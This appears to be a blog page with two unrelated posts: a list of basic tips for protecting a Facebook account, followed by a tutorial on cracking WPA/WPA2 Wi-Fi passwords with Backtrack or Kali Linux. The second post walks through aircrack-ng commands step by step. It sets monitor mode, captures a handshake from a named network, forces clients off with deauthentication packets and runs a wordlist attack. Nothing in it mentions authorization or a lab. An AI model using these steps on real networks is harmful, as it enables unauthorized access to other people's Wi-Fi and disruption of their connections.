Pages

5 Dec 2017

How to protect facebook your account from Hackers.



Imagine you wake up early in the morning, just to find that you couldn’t log on to your Facebook account. While you are just wondering about the reason for this lockout problem, your friend calls you to check if you are fine seeing your weird Facebook status. At times like these, how do you say your account is secure enough? How do you protect your Facebook account from hackers?






Steps 1



Never share your passwords with anyone including your friends and family.Browsing through a secure connection is always advisable.




2 Step









Don’t get your news feed flooded with suspicious links. Ensure that you don’t click on any links of games, apps, and others that you are not sure of. Avoid permitting third party apps accessing your information. If you are not using any apps, it’s better to disable or remove those apps.




3 Step



Add a secondary email ID to your account. In case your profile is hacked, Facebook will send account recovery information to the secondary email ID also. Before these steps, understand the privacy policy of Facebook.




4 Step



Ensure that you accept only persons you know as your friends as when you accept strangers, you allow them to access your personal information. It’s always better to avoid posting any financial or personal details.




5 Step



Change your passwords regularly and use unique passwords. Don’t forget to activate your login notifications.




6 Step



Keep Your PC Security Updated. Nowadays one of the easiest processes to hack a Facebook account is phishing attacks. That's why always use a trusted antivirus program to detect those phishing sites. Besides it will help you to keep harmful keyloggers off your computer. And most importantly never forget to update its database. Ever. In addition to updating antivirus, keep your Firewall switched on and updated, use latest version of your favorite browser and download OS security updates regularly.




7 Step

Keep it secure at all times. Facebook is like a best buddy, a chronicle of your life, your diary of sorts and an outlet for your creativity. You can’t risk your Facebook account at any cost and should certainly try all the possible ways to keep it as personal and secure as you can.

Wifi Hacking using Backtrack or Kali linux



Assalam-o-Alikum to all of you!

This lecture is about wpa\wpa2 cracking.

Requirements for WPA\wpa2 cracking:

1= Backtrack 5r3

2= WiFi device

3= world-list file


The commands which we will need in wpa\wpa2 cracking are as under:


1= Airmon-ng

2= Airmon-ng start wlan0

3= Airodump-ng mon0

4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0

5= Aireplay-ng --deauth 1 -a (bssid) mon0

6= Aircrack-ng (file name) -w( drag worldlist file )


Process . . . .


1= * Open terminal and type first command:

Airmon-ng :

This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)




2= * Now type second command :

Airmon-ng start wlan0 :

This command enables monitor mode on the wireless interface. (As shown)




3= * Now type third command:

Airodump-ng mon0 :

This command will scane all networks. (AS shown)




4=* Now type foruth command:

Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :

This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:

airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)




5= * Now type fifth command :

Aireplay-ng --deauth 64 -a (bssid) mon0 :

This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:

aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)




6= * Now type sixth command : NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"

Aircrack-ng (file name) -w( drag world-list file ) :

This command will crack the password. (As Shown) :lol:




Hope all of you get it. If any problem ask me ( Must Reply ) & if there is any mistake you can tell me I'll correct it.